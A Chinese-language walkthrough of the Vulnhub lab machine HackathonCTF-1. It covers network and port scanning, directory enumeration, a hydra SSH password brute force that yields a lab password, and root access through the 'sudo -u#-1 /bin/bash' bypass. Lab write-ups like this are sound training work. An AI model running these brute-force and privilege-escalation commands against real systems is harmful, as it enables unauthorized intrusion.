Vulnhub靶机：HackathonCTF-1

Vulnhub

简介

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://www.vulnhub.com

下载下来解压。这里我用的是Oracle VirtualBox。

VMware Workstation Pro我试了一下不行。

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth1 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.217.216后使用namp扫描靶机。

nmap 192.168.217.216 -A -O -p 1-65535

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。

开放22，23，80，7223端口。7223端口是ssh。扫一下目录。

gobuster dir -u 192.168.217.216 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,jsp,html,db,txt

看了一下/robots.txt，给了一个编码过的东西。解码一下

解码之后就是提示而已。提示我们从ssh入手最后是通过sudo提权。

在查看其他的文件。在sudo.html里面找到了用户。和ftc.html找到了东西。

感觉像是ascll。不管了先爆破一会。

hydra -l just -P /usr/share/wordlists/rockyou.txt ssh://192.168.217.216:7223 -V -I

test
jordan23

登录上去之后安排脚本。

可以内核提权。但是没有gcc，那只能sudo提权了。

大概就是告诉我们可以用非root权限执行全部命令。

sudo -u#-1 /bin/bash

直接提权到root了。

后续

我发现ctf这个用户可以执行全部权限。那么严格来说如果我们知道ctf用户的密码是不是就可以执行了？

不知道为什么在学校不能下载https://vulnyx.com/的靶机。可能只能打Vulnhub的了。